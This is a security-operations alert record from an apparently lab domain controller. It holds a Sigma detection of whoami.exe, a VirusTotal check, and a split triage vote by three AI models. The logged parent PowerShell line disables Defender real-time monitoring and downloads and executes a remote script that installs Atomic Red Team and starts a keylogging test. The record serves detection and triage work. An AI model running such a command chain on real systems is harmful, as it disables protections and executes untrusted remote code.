{
  "author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
  "cat": "Local Accounts Discovery",
  "detect": {
    "event": {
      "COMMAND_LINE": "\"C:\\Windows\\system32\\whoami.exe\"",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\system32\\whoami.exe",
      "HASH": "1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a",
      "MEMORY_USAGE": 32768,
      "PARENT": {
        "BASE_ADDRESS": 140694944940032,
        "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "MEMORY_USAGE": 193449984,
        "PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "PARENT_PROCESS_ID": 2440,
        "PROCESS_ID": 3164,
        "THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
        "THREADS": 32,
        "TIMESTAMP": 1774364726507,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3164,
      "PROCESS_ID": 9048,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
      "event_time": 1774364762339,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 1500,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "6b593eddb775332b5050941f69c2a838",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "21a8a6a7b8dd3620e299741b69c2a85b"
    }
  },
  "detect_id": "b9630d02-2865-44ef-a966-031d69c2a85b",
  "detect_mtd": {
    "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
    "description": "Local accounts, System Owner/User discovery using operating systems utilities",
    "falsepositives": [
      "Legitimate administrator or user enumerates local users for legitimate reason"
    ],
    "level": "low",
    "references": [
      "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md"
    ],
    "tags": [
      "attack.discovery",
      "attack.t1033",
      "attack.t1087.001"
    ]
  },
  "gen_time": 1774364763841,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=21a8a6a7b8dd3620e299741b69c2a85b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
    "event_time": 1774364762339,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 1500,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "6b593eddb775332b5050941f69c2a838",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "21a8a6a7b8dd3620e299741b69c2a85b"
  },
  "rule_tags": [
    "attack.t1087.001",
    "ext:ext-sigma",
    "attack.discovery",
    "attack.t1033"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.windows_process_creation/proc_creation_win_susp_local_system_owner_account_discovery",
  "ts": 1774364764000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 3,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.867,
  "false_positive_reason": null,
  "investigation_questions": [
    "Who initiated the PowerShell command and from what session/account?",
    "Is the host part of a designated testing environment?",
    "Were there any other suspicious network connections to \u0027raw.githubusercontent.com\u0027?"
  ],
  "ioc_analysis": "The binary \u0027whoami.exe\u0027 is a legitimate, signed Microsoft utility; however, its execution in this context is part of a deliberate discovery technique. The parent PowerShell process is highly suspicious as it disables security controls (Windows Defender) and executes a script directly from a remote GitHub repository.",
  "iocs_extracted": [
    "C:\\Windows\\system32\\whoami.exe",
    "1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
  ],
  "mitre_techniques": [
    "T1033",
    "T1059.001",
    "T1562.001",
    "T1056.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Verify if an authorized security assessment or \u0027Atomic Red Team\u0027 test was scheduled for this host.",
    "Immediate remediation: Re-enable Windows Defender Real-time Monitoring (Set-MpPreference -DisableRealtimeMonitoring $false).",
    "Investigate the origin of the PowerShell script to ensure it was initiated by an authorized user."
  ],
  "risk_score": 57,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/3 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThe detection identifies the execution of \u0027whoami.exe\u0027 as the SYSTEM user, which is a clear instance of local account discovery. The activity is part of an Atomic Red Team (ART) security simulation (T1056.001), as evidenced by the parent PowerShell process downloading and invoking the ART framework while simultaneously disabling Windows Defender real-time monitoring.\n\n**IOC Analysis:** The binary \u0027whoami.exe\u0027 is a legitimate, signed Microsoft utility; however, its execution in this context is part of a deliberate discovery technique. The parent PowerShell process is highly suspicious as it disables security controls (Windows Defender) and executes a script directly from a remote GitHub repository.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.95\nThe detection flagged whoami.exe execution under SYSTEM account as suspicious, but this is a common legitimate behavior for system processes and diagnostic tools. The parent process PowerShell executed with Unrestricted policy and downloaded malicious content, indicating the real threat is the PowerShell activity, not the whoami call itself.\n\n**IOC Analysis:** whoami.exe is a legitimate Windows utility located in System32 and signed by Microsoft. Its execution under SYSTEM account is expected for system diagnostics or administrative tasks. The actual IOC of concern is the PowerShell command line containing IEX (Invoke-Expression) and downloading from GitHub, which indicates potential malicious activity.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection event involves a process creation of whoami.exe, a legitimate Windows system tool, but it was spawned by a PowerShell process with suspicious command-line arguments that include disabling antivirus and installing unauthorized tools, indicating potential malicious intent for local account discovery.\n\n**IOC Analysis:** The FILE_PATH C:\\Windows\\system32\\whoami.exe is a known legitimate Windows binary located in the expected system directory. The HASH is signed, suggesting it is Microsoft-signed and typically legitimate. However, the command-line context shows it was invoked by a PowerShell process executing suspicious scripts, raising suspicion due to the parent process\u0027s actions.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 95% confidence)",
      "qwen3.5:4b: false_positive (low, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "false_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}